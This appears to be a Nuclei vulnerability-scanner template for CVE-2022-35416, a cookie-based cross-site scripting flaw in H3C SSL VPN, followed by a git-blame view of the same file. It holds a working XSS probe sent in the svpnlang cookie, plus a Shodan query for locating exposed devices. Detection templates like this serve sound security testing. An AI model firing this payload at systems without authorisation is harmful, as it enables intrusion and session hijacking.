nuclei-templates/http/cves/2022/CVE-2022-35416.yaml

id: CVE-2022-35416

info:
  name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting
  author: 0x240x23elu
  severity: medium
  description: |
    H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.
  remediation: |
    Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability.
  reference:
    - https://github.com/advisories/GHSA-9x76-78gc-r3m9
    - https://github.com/Docker-droid/H3C_SSL_VPN_XSS
    - https://nvd.nist.gov/vuln/detail/CVE-2022-35416
    - https://github.com/ARPSyndicate/kenzer-templates
    - https://github.com/bughunter0xff/recon-scanner
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-35416
    cwe-id: CWE-79
    epss-score: 0.00102
    epss-percentile: 0.41641
    cpe: cpe:2.3:a:h3c:ssl_vpn:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: h3c
    product: ssl_vpn
    shodan-query: http.html_hash:510586239
  tags: cve,cve2022,xss,vpn,h3c

http:
  - raw:
      - |
        GET /wnm/login/login.json HTTP/1.1
        Host: {{Hostname}}
        Cookie: svpnlang=<script>alert('document.domain')</script>

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert('document.domain')</script>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207d82b266b0760fde1b26ab005ed128cfe7c783b52db28f94bc666c9d03bb196002210098ccdcab8e372c1dd43317407e690f228e8cb1bc1c8add5c95870ceb805b2713:922c64590222798bb761d5b6d8e72950
Create CVE-2022-35416.yaml 2022-07-14 10:44:12 +00:00			`id: CVE-2022-35416`

			`info:`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`name: H3C SSL VPN <=2022-07-10 - Cross-Site Scripting`
Create CVE-2022-35416.yaml 2022-07-14 10:44:12 +00:00			`author: 0x240x23elu`
Auto Generated CVE annotations [Fri Sep 16 20:03:07 UTC 2022] :robot: 2022-09-16 20:03:07 +00:00			`severity: medium`
Create CVE-2022-35416.yaml 2022-07-14 10:44:12 +00:00			`description: \|`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`H3C SSL VPN 2022-07-10 and prior contains a cookie-based cross-site scripting vulnerability in wnm/login/login.json svpnlang.`
Added Impact 2023-09-27 15:51:13 +00:00			`impact: \|`
			`Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, data theft, or other malicious activities.`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`remediation: \|`
			`Apply the latest security patch or upgrade to a version of H3C SSL VPN that is not affected by this vulnerability.`
Create CVE-2022-35416.yaml 2022-07-14 10:44:12 +00:00			`reference:`
			`- https://github.com/advisories/GHSA-9x76-78gc-r3m9`
			`- https://github.com/Docker-droid/H3C_SSL_VPN_XSS`
			`- https://nvd.nist.gov/vuln/detail/CVE-2022-35416`
TemplateMan Update [Mon Jan 29 17:11:13 UTC 2024] :robot: 2024-01-29 17:11:14 +00:00			`- https://github.com/ARPSyndicate/kenzer-templates`
			`- https://github.com/bughunter0xff/recon-scanner`
Auto Generated CVE annotations [Sat Jul 16 12:45:45 UTC 2022] :robot: 2022-07-16 12:45:45 +00:00			`classification:`
Auto Generated CVE annotations [Fri Sep 16 20:03:07 UTC 2022] :robot: 2022-09-16 20:03:07 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
			`cvss-score: 6.1`
Dashboard Content Enhancements (#5372) Dashboard Content Enhancements 2022-09-16 19:50:10 +00:00			`cve-id: CVE-2022-35416`
Auto Generated CVE annotations [Fri Sep 16 20:03:07 UTC 2022] :robot: 2022-09-16 20:03:07 +00:00			`cwe-id: CWE-79`
product/queries updated 2024-05-31 19:23:20 +00:00			`epss-score: 0.00102`
			`epss-percentile: 0.41641`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`cpe: cpe:2.3:a:h3c:ssl_vpn::::::::`
Create CVE-2022-35416.yaml 2022-07-14 10:44:12 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: h3c`
			`product: ssl_vpn`
updated 2022 CVEs 2023-09-06 11:59:08 +00:00			`shodan-query: http.html_hash:510586239`
Create CVE-2022-35416.yaml 2022-07-14 10:44:12 +00:00			`tags: cve,cve2022,xss,vpn,h3c`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2022-35416.yaml 2022-07-14 10:44:12 +00:00			`- raw:`
			`- \|`
			`GET /wnm/login/login.json HTTP/1.1`
			`Host: {{Hostname}}`
			`Cookie: svpnlang=<script>alert('document.domain')</script>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: body`
			`words:`
			`- "<script>alert('document.domain')</script>"`

			`- type: word`
			`part: header`
			`words:`
			`- text/html`

			`- type: status`
			`status:`
			`- 200`
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot: 2024-06-01 06:53:00 +00:00			`# digest: 4a0a0047304502207d82b266b0760fde1b26ab005ed128cfe7c783b52db28f94bc666c9d03bb196002210098ccdcab8e372c1dd43317407e690f228e8cb1bc1c8add5c95870ceb805b2713:922c64590222798bb761d5b6d8e72950`